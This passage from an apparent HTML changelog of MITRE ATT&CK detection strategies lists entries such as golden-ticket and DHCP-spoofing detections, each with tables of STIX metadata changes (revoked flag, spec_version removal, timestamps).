15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0268] Detect Archiving via Library (T1560.002)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0298] Detect Archiving via Utility (T1560.001)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0035] Detect Bidirectional Web Service C2 Channels via Process & Network Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0523] Detect Code Signing Policy Modification (Windows & macOS)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0336] Detect Compromise of Host Software Binaries</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0030] Detect Conditional Access Policy Modification in Identity and Cloud Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0250] Detect Credential Discovery via Windows Registry Enumeration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0430] Detect Credentials Access from Password Stores</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0468] Detect DHCP Spoofing Across Linux, Windows, and macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0061] Detect Default File Association Hijack via Registry & Execution Correlation on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0187] Detect Disabled Windows Event Log</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:24:45.876Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0271] Detect Domain Controller Authentication Process Modification (Skeleton Key)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0379] Detect Evil Twin Wi-Fi Access Points on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0028] Detect Excessive or Unauthorized Bandwidth Usage for Botnet, Proxyjacking, or Scanning Purposes</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0022] Detect Forced SMB/WebDAV Authentication via lure files and outbound NTLM</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0144] Detect Forged Kerberos Golden Tickets (T1558.001)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 